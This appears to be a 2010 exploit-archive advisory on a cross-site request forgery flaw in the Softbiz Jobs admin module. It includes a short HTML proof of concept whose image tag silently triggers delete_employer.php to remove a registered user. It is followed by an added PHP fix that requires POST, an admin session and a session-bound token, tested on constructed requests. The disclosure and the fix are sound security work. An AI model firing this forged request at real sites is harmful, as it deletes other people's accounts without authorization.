
Softbiz Jobs CSRF Vulnerability

Author: Pratul Agrawal
Risk: [Security Risk Unsorted]
0day-ID: 0day-ID-11037
Category: web applications
Date added: 23-02-2010
Platform: unsorted
                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in: Admin module
  
# company       aksitservices
  
# Credit by     Pratul Agrawal
 
# Download      http://www.softbizscripts.com/
 
# Script        softbizscripts
 
  
  
# Proof of concept
 
Script to delete a registered user through cross-site request forgery
 
             ...................................................................................................................
 
                        <html>
                          <body>
                              <img src="http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />
                          </body>
                        </html>
 
 
             ...................................................................................................................
 
 
 
After execution, refresh the page and you can see that the user with id=20 has been deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 
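
One way to close this hole on the server side, shown as an added example that is not Softbiz's code and not part of the original advisory: the delete action accepts only POST, requires an admin session, and checks a per-session token. The names `csrf_token`, `handle_delete`, the `$deleteEmployer` callback and the session keys are hypothetical, and the requests at the bottom are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not Softbiz code: all names and session keys are hypothetical.

// Issue (or reuse) the per-session token the admin form embeds in a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Decide the HTTP status for a delete request; deletes only if every check passes.
function handle_delete(string $method, array $post, array $session, callable $deleteEmployer): int
{
    if ($method !== 'POST') {
        return 405; // state changes never happen on GET, which is all an <img> can send
    }
    if (empty($session['is_admin'])) {
        return 403; // no authenticated admin session
    }
    $sent = $post['csrf'] ?? '';
    if (!is_string($sent) || empty($session['csrf']) || !hash_equals($session['csrf'], $sent)) {
        return 403; // token missing or not the one bound to this session
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400; // id must be a positive integer
    }
    $deleteEmployer($id);
    return 303; // redirect back to the employer list
}

// Constructed requests, run from the CLI with an in-memory "database".
$session = ['is_admin' => true];
$token = csrf_token($session);
$employers = [20 => 'constructed employer'];
$delete = function (int $id) use (&$employers): void { unset($employers[$id]); };

$cases = [
    'cross-site GET via <img>' => ['GET', []],
    'POST without token' => ['POST', ['id' => '20']],
    'POST with session token' => ['POST', ['id' => '20', 'csrf' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    $status = handle_delete($method, $post, $session, $delete);
    printf("%-26s -> %d, employer 20 %s\n", $label, $status, isset($employers[20]) ? 'present' : 'deleted');
}
```

Setting the SameSite attribute on the session cookie is a complementary control, not a replacement for the token check.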


